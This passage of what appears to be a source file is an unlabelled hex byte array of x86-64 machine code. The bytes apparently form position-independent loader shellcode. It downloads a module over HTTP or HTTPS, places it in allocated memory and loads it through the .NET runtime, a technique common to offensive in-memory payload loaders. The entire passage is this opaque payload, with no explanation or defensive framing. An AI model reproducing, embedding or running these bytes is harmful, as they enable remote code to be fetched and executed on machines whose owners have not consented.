108 0x48, 0x89, 0x85, 0x08, 0x02, 0x00, 0x00, 0xc7, 0x85, 0xe0, 0x01, 0x00,
109 0x00, 0x00, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x10, 0x02, 0x00, 0x00, 0x00,
110 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
111 0x80, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00,
112 0x48, 0x8d, 0x8a, 0x10, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x01,
113 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x10, 0xba,
114 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00,
115 0x00, 0x00, 0x00, 0xe9, 0x5a, 0x04, 0x00, 0x00, 0x8b, 0x85, 0xd4, 0x01,
116 0x00, 0x00, 0x83, 0xf8, 0x04, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89,
117 0x85, 0x74, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00,
118 0x74, 0x0a, 0x81, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x00, 0x30, 0x80, 0x00,
119 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd0, 0x00,
120 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9,
121 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00,
122 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
123 0x85, 0x68, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x68, 0x02, 0x00, 0x00,
124 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe9, 0x03, 0x00,
125 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd8,
126 0x00, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00, 0x74, 0x08,
127 0x41, 0xb8, 0xbb, 0x01, 0x00, 0x00, 0xeb, 0x06, 0x41, 0xb8, 0x50, 0x00,
128 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d,
129 0x68, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00,
130 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
131 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
132 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
133 0x85, 0x60, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x60, 0x02, 0x00, 0x00,
134 0x00, 0x0f, 0x84, 0xb1, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02,
135 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
136 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x92, 0x10, 0x06, 0x00, 0x00, 0x4c,
137 0x8d, 0x45, 0xc0, 0x48, 0x8b, 0x8d, 0x60, 0x02, 0x00, 0x00, 0x48, 0xc7,
138 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x78, 0x02, 0x00,
139 0x00, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,
140 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
141 0xb9, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x89, 0xd2, 0xff, 0xd0, 0x48, 0x89,
142 0x85, 0x58, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x58, 0x02, 0x00, 0x00,
143 0x00, 0x0f, 0x84, 0x2b, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00,
144 0x00, 0x00, 0x74, 0x4f, 0x8b, 0x85, 0x78, 0x02, 0x00, 0x00, 0x25, 0x00,
145 0x10, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x40, 0xc7, 0x85, 0x54, 0x02, 0x00,
146 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0x02, 0x00, 0x00, 0x80,
147 0x33, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
148 0x80, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x3c, 0x02, 0x00, 0x00,
149 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00,
150 0x00, 0x49, 0x89, 0xd0, 0xba, 0x1f, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
151 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x00, 0x01, 0x00,
152 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
153 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8,
154 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85,
155 0xc0, 0x0f, 0x84, 0x81, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00,
156 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00,
157 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
158 0x80, 0x08, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x34, 0x02, 0x00, 0x00,
159 0x48, 0x8d, 0x95, 0x30, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02,
160 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x4d,
161 0x89, 0xc1, 0x49, 0x89, 0xd0, 0xba, 0x13, 0x00, 0x00, 0x20, 0xff, 0xd0,
162 0x85, 0xc0, 0x0f, 0x84, 0x2c, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x30, 0x02,
163 0x00, 0x00, 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x1b, 0x01, 0x00,
164 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x48,
165 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x80, 0x40, 0x07, 0x00,
166 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00,
167 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02,
168 0x00, 0x00, 0x4c, 0x8d, 0x82, 0x40, 0x07, 0x00, 0x00, 0x48, 0x8d, 0x95,
169 0x34, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x48,
170 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd1, 0xba,
171 0x05, 0x00, 0x00, 0x20, 0xff, 0xd0, 0x85, 0xc0, 0x0f, 0x84, 0xba, 0x00,
172 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80,
173 0x40, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xa3, 0x00, 0x00,
174 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48,
175 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07,
176 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30,
177 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2,
178 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x89, 0x90, 0x48, 0x07,
179 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80,
180 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x53, 0xc7, 0x85, 0x38,
181 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02,
182 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
183 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x41,
184 0x89, 0xd2, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92,
185 0x48, 0x07, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x38, 0x02, 0x00, 0x00, 0x48,
186 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x45, 0x89, 0xd0,
187 0xff, 0xd0, 0x89, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90,
188 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b,
189 0x95, 0x58, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
190 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00,
191 0x48, 0x8b, 0x95, 0x60, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0,
192 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00,
193 0x00, 0x00, 0x48, 0x8b, 0x95, 0x68, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1,
194 0xff, 0xd0, 0x83, 0xbd, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x99,
195 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
196 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x48, 0x02, 0x00, 0x00,
197 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x80, 0x40, 0x07,
198 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x90,
199 0x30, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48,
200 0x05, 0x20, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x48, 0x02, 0x00, 0x00,
201 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x35,
202 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
203 0x28, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18,
204 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xca, 0x31, 0x00, 0x00, 0x48,
205 0x89, 0x85, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48, 0x02, 0x00,
206 0x00, 0x48, 0x8b, 0x80, 0x08, 0x19, 0x00, 0x00, 0x48, 0x3b, 0x85, 0x40,
207 0x02, 0x00, 0x00, 0x74, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x06,
208 0x8b, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x00, 0x03, 0x00,
209 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48,
210 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xc7, 0x45, 0xf4, 0x00, 0x00,
211 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
212 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x10,
213 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89,
214 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x48,
215 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48,
216 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xf7,
217 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x18, 0x01,
218 0x00, 0x00, 0x4c, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81,
219 0xc2, 0x2c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1,
220 0x1c, 0x04, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4,
221 0x00, 0x0f, 0x88, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48,
222 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x55,
223 0x18, 0x4c, 0x8d, 0x4a, 0x08, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82,
224 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x4c, 0x8d, 0x52, 0x04,
225 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x0a, 0x4c, 0x89, 0xd2, 0xff, 0xd0,
226 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x6c, 0x48, 0x8b, 0x45,
227 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50,
228 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x48, 0x8d, 0x55, 0xc4,
229 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x5f, 0x8b,
230 0x45, 0xc4, 0x85, 0xc0, 0x74, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
231 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55,
232 0x18, 0x4c, 0x8d, 0x4a, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82,
233 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x92, 0x4c,
234 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c,
235 0x89, 0xd2, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0xeb, 0x19, 0x48, 0x8b, 0x45,
236 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0b, 0x48,
237 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d,
238 0xf4, 0x00, 0x79, 0x43, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x10,
239 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x83, 0xc2, 0x10, 0x48,
240 0x8b, 0x4d, 0x10, 0x4c, 0x8d, 0x81, 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b,
241 0x4d, 0x10, 0x48, 0x81, 0xc1, 0x4c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54,
242 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00,
243 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83,
244 0x7d, 0xf4, 0x00, 0x79, 0x16, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40,
245 0x10, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x02,
246 0x02, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48,
247 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b,
248 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d,
249 0xf4, 0x00, 0x0f, 0x88, 0xd6, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
250 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x48,
251 0x81, 0xc2, 0x04, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
252 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48,
253 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d,
254 0x42, 0x18, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x10, 0x48, 0x8b,
255 0x55, 0xe0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff,
256 0xd0, 0x89, 0x45, 0xf4, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xb8,
257 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0,
258 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b,
259 0x45, 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00,
260 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d, 0x42, 0x20, 0x48, 0x8b, 0x55, 0x10,
261 0x4c, 0x8d, 0x8a, 0x6c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48,
262 0x8b, 0x4a, 0x18, 0x4c, 0x89, 0xca, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83,
263 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x2d, 0x01, 0x00, 0x00, 0xc7, 0x45, 0xcc,
264 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10,
265 0x19, 0x00, 0x00, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
266 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc8, 0x49, 0x89, 0xd0,
267 0xba, 0x01, 0x00, 0x00, 0x00, 0xb9, 0x11, 0x00, 0x00, 0x00, 0xff, 0xd0,
268 0x48, 0x89, 0x45, 0xd8, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x0f, 0x84, 0xeb,
269 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
270 0x45, 0xd8, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x20,
271 0x8b, 0x55, 0xf0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48,
272 0x8b, 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19,
273 0x00, 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48,
274 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39,
275 0xc2, 0x72, 0xcd, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48,
276 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55,
277 0x18, 0x4c, 0x8d, 0x42, 0x28, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a,
278 0x20, 0x48, 0x8b, 0x55, 0xd8, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d,
279 0xf4, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xec, 0xc7,
280 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b,
281 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x2f, 0x8b, 0x55, 0xf0, 0x48,
282 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48, 0x8b, 0x55, 0xf8, 0x8b,
283 0x45, 0xf0, 0xc6, 0x84, 0x02, 0x18, 0x19, 0x00, 0x00, 0x00, 0x48, 0x8b,
284 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19, 0x00,
285 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48, 0x8b,
286 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39, 0xc2,
287 0x72, 0xbe, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00,
288 0x00, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x8b, 0x45,
289 0xec, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec,
290 0x48, 0x01, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
291 0x48, 0x89, 0x8d, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x95, 0xe8, 0x00,
292 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
293 0x00, 0x48, 0xc7, 0x85, 0x88, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
294 0x48, 0xc7, 0x45, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x18,
295 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x20, 0x00, 0x00, 0x00, 0x00,
296 0x66, 0xc7, 0x45, 0xea, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00,
297 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16,
298 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00,
299 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b,
300 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00,
301 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00,
302 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0x1f, 0x03, 0x00,
303 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28,
304 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b,
305 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x38, 0x48, 0x8b, 0x95,
306 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x4c, 0x89, 0xc2, 0xff,
307 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00,
308 0x00, 0x00, 0x0f, 0x88, 0xc8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8,
309 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b,
310 0x80, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00,
311 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8d, 0x95, 0x88, 0x00, 0x00, 0x00, 0xff,
312 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00,
313 0x00, 0x00, 0x0f, 0x88, 0x49, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
314 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b,
315 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x49, 0x89, 0xd0,
316 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00,
317 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa8,
318 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d,
319 0x55, 0xe4, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0,
320 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x8b, 0x45, 0xe0,
321 0x29, 0xc2, 0x89, 0xd0, 0x83, 0xc0, 0x01, 0x89, 0x85, 0x94, 0x00, 0x00,
322 0x00, 0x83, 0xbd, 0x94, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x79, 0x01,
323 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
324 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
325 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
326 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00,
327 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00,
328 0x00, 0x00, 0x66, 0xc7, 0x45, 0x30, 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0,
329 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b,
330 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00, 0x41,
331 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00,
332 0xff, 0xd0, 0x48, 0x89, 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00,
333 0x00, 0xeb, 0x5b, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b,
334 0x98, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00,
335 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2,
336 0x48, 0x83, 0xc2, 0x04, 0x48, 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48,
337 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2,
